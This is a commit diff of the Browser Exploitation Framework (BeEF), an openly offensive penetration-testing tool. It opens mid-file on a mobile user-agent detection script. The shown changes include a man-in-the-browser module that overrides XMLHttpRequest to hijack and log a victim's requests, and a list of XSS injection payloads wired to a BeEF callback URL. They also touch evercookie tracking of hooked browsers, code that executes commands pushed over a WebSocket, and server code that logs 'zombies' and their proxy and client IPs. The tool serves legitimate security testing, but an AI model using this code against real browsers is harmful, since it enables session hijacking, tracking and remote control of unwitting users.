return false;
};
function DetectXbox()
{
if (uagent.search(deviceXbox) > -1)
return true;
else
return false;
};
function DetectGameConsole()
{
if (DetectSonyPlaystation())
return true;
if (DetectNintendo())
return true;
if (DetectXbox())
return true;
else
return false;
};
function DetectKindle()
{
if (uagent.search(deviceKindle) > -1 &&
!DetectAndroid())
return true;
else
return false;
}
function DetectAmazonSilk()
{
if (uagent.search(engineSilk) > -1)
return true;
else
return false;
}
function DetectMobileQuick()
{
if (DetectTierTablet())
return false;
if (DetectSmartphone())
return true;
if (uagent.search(deviceMidp) > -1 ||
DetectBrewDevice())
return true;
if (DetectOperaMobile())
return true;
if (uagent.search(engineNetfront) > -1)
return true;
if (uagent.search(engineUpBrowser) > -1)
return true;
if (uagent.search(engineOpenWeb) > -1)
return true;
if (DetectDangerHiptop())
return true;
if (DetectMaemoTablet())
return true;
if (DetectArchos())
return true;
if ((uagent.search(devicePda) > -1) &&
!(uagent.search(disUpdate) > -1))
return true;
if (uagent.search(mobile) > -1)
return true;
if (DetectKindle() ||
DetectAmazonSilk())
return true;
return false;
};
function DetectMobileLong()
{
if (DetectMobileQuick())
return true;
if (DetectGameConsole())
return true;
if (DetectSonyMylo())
return true;
if (uagent.search(manuSamsung1) > -1 ||
uagent.search(manuSonyEricsson) > -1 ||
uagent.search(manuericsson) > -1)
return true;
if (uagent.search(svcDocomo) > -1)
return true;
if (uagent.search(svcKddi) > -1)
return true;
if (uagent.search(svcVodafone) > -1)
return true;
return false;
};
function DetectTierTablet()
{
if (DetectIpad()
|| DetectAndroidTablet()
|| DetectBlackBerryTablet()
|| DetectWebOSTablet())
return true;
else
return false;
};
function DetectTierIphone()
{
if (DetectIphoneOrIpod())
return true;
if (DetectAndroidPhone())
return true;
if (DetectBlackBerryWebKit() && DetectBlackBerryTouch())
return true;
if (DetectWindowsPhone7())
return true;
if (DetectPalmWebOS())
return true;
if (DetectGarminNuvifone())
return true;
else
return false;
};
function DetectTierRichCss()
{
if (DetectMobileQuick())
{
if (DetectTierIphone() || DetectKindle())
return false;
if (DetectWebkit())
return true;
if (DetectS60OssBrowser())
return true;
if (DetectBlackBerryHigh())
return true;
if (DetectWindowsMobile())
return true;
if (uagent.search(engineTelecaQ) > -1)
return true;
else
return false;
}
else
return false;
};
function DetectTierOtherPhones()
{
if (DetectMobileLong())
{
if (DetectTierIphone() || DetectTierRichCss())
return false;
else
return true;
}
else
return false;
};
function InitDeviceScan()
{
isIphone = DetectIphoneOrIpod();
isAndroidPhone = DetectAndroidPhone();
isTierIphone = DetectTierIphone();
isTierTablet = DetectTierTablet();
isTierRichCss = DetectTierRichCss();
isTierGenericMobile = DetectTierOtherPhones();
};
InitDeviceScan()

3
core/main/client/logger.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -50,6 +50,7 @@ beef.logger = {
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();

77
core/main/client/mitb.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -14,47 +14,30 @@ beef.mitb = {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
var hook_file = "<%= @hook_file %>";
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
// Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
// or a request initiated by the MiTB itself.
if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
open.call(this, method, url, async, true);
}else {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
var requestPort;
if (portR != null) { requestPort = portR[0].split(":")[1]; }
//GET request
if (method == "GET") {
//GET request -> cross-domain
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
}else { //GET request -> same-domain
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
@@ -63,26 +46,19 @@ beef.mitb = {
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
// write the url of the page
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}else{
//POST request
beef.mitb.sniff("POST ajax request to: " + url);
open.call(this, method, url, async, true);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
@@ -161,7 +137,7 @@ beef.mitb = {
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.open('POST', url, false, true);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
@@ -181,14 +157,13 @@ beef.mitb = {
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
};
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
@@ -204,7 +179,7 @@ beef.mitb = {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.open('GET', url, false, true);
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
@@ -223,11 +198,9 @@ beef.mitb = {
beef.mitb.sniff("GET: " + url);
} catch (x) {
// the link is cross-domain, so load the resource in a different tab
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},

2
core/main/client/net.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

4
core/main/client/net/dns.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }

2
core/main/client/net/local.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/net/portscanner.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

2
core/main/client/net/requester.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

46
core/main/client/os.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -7,9 +7,9 @@
beef.os = {
ua: navigator.userAgent,
isWin311: function() {
return (this.ua.indexOf("Win16") != -1) ? true : false;
return (this.ua.match('(Win16)')) ? true : false;
},
isWinNT4: function() {
@@ -19,18 +19,25 @@ beef.os = {
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
isWinME: function() {
return (this.ua.indexOf('Windows ME') != -1) ? true : false;
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -47,6 +54,10 @@ beef.os = {
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -103,19 +114,26 @@ beef.os = {
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
isWindows: function() {
return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
},
getName: function() {
//windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWinXP()) return 'Windows XP';
//Windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWinCE()) return 'Windows CE';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWin2000SP1()) return 'Windows 2000 SP1';
if(this.isWinXP()) return 'Windows XP';
if(this.isWinServer2003()) return 'Windows Server 2003';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWin8()) return 'Windows 8';
//Nokia
if(this.isNokia()) {

17
core/main/client/session.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -13,7 +13,8 @@ beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK");
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK");
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK");
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id);
this.ec.evercookie_userdata("BEEFHOOK", id);
this.ec.evercookie_window("BEEFHOOK", id);
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**

2
core/main/client/timeout.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

5
core/main/client/updater.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -15,6 +15,7 @@ beef.updater = {
// XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock.
lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});

9
core/main/client/websocket.js
View File

@@ -1,5 +1,5 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
@@ -53,9 +53,10 @@ beef.websocket = {
};
this.socket.onmessage = function (message) {
//todo: double-check if there is a way to don't use eval here. It's not a big deal,
//todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
eval(message.data);
// Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
// That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
// It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
new Function(message.data)();
};
this.socket.onclose = function () {

2
core/main/command.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/configuration.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

4
core/main/console/banners.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -86,7 +86,7 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
print_more data
end

2
core/main/console/commandline.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/constants/browsers.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/constants/commandmodule.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/constants/distributedengine.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

8
core/main/constants/hardware.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -12,6 +12,8 @@ module Constants
module Hardware
HW_UNKNOWN_IMG = 'pc.png'
HW_VM_IMG = 'vm.png'
HW_LAPTOP_IMG = 'laptop.png'
HW_IPHONE_UA_STR = 'iPhone'
HW_IPHONE_IMG = 'iphone.jpg'
HW_IPAD_UA_STR = 'iPad'
@@ -32,8 +34,8 @@ module Constants
HW_HTC_IMG = 'htc.ico'
HW_MOTOROLA_UA_STR = 'motorola'
HW_MOTOROLA_IMG = 'motorola.png'
HW_GOOGLE_UA_STR = 'Nexus One'
HE_GOOGLE_IM = 'nexus.png'
HW_GOOGLE_UA_STR = 'Nexus'
HW_GOOGLE_IMG = 'nexus.png'
HW_ERICSSON_UA_STR = 'Ericsson'
HW_ERICSSON_IMG = 'sony_ericsson.png'
HW_ALL_UA_STR = 'All'

2
core/main/constants/os.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/crypto.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

2
core/main/distributed_engine/models/rules.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#

131
core/main/handlers/browserdetails.rb
View File

@@ -1,5 +1,5 @@
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
@@ -68,6 +68,7 @@ module BeEF
}
zombie.httpheaders = @http_headers.to_json
zombie.save
#puts "HTTP Headers: #{zombie.httpheaders}"
# add a log entry for the newly hooked browser
BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
self.err_msg "Invalid browser name returned from the hook browser's initial connection."
end
# detect browser proxy
using_proxy = false
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'PROXY_CONNECTION',
'PROXY_AUTHENTICATE',
'X_FORWARDED',
'X_FORWARDED_FOR',
'VIA'
].each do |header|
unless JSON.parse(zombie.httpheaders)[header].nil?
using_proxy = true
break
end
end
# retrieve proxy client IP
proxy_clients = []
[
'CLIENT_IP',
'FORWARDED_FOR',
'FORWARDED',
'FORWARDED_FOR_IP',
'X_FORWARDED',
'X_FORWARDED_FOR'
].each do |header|
proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
end
# retrieve proxy server
proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
# store and log proxy details
if using_proxy == true
BD.set(session_id, 'UsingProxy', "#{using_proxy}")
proxy_log_string = "#{zombie.ip} is using a proxy"
unless proxy_clients.nil?
BD.set(session_id, 'ProxyClient', "#{proxy_clients.sort.uniq.join(',')}")
proxy_log_string += " [client: #{proxy_clients.sort.uniq.join(',')}]"
end
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
# get and store browser version
browser_version = get_param(@data['results'], 'BrowserVersion')
if BeEF::Filters.is_valid_browserversion?(browser_version)
@@ -168,11 +219,11 @@ module BeEF
end
# get and store the system platform
system_platform = get_param(@data['results'], 'SystemPlatform')
system_platform = get_param(@data['results'], 'BrowserPlatform')
if BeEF::Filters.is_valid_system_platform?(system_platform)
BD.set(session_id, 'SystemPlatform', system_platform)
BD.set(session_id, 'BrowserPlatform', system_platform)
else
self.err_msg "Invalid system platform returned from the hook browser's initial connection."
self.err_msg "Invalid browser platform returned from the hook browser's initial connection."
end
# get and store the hooked browser type
@@ -199,14 +250,6 @@ module BeEF
self.err_msg "Invalid window size returned from the hook browser's initial connection."
end
# get and store the yes|no value for JavaEnabled
java_enabled = get_param(@data['results'], 'JavaEnabled')
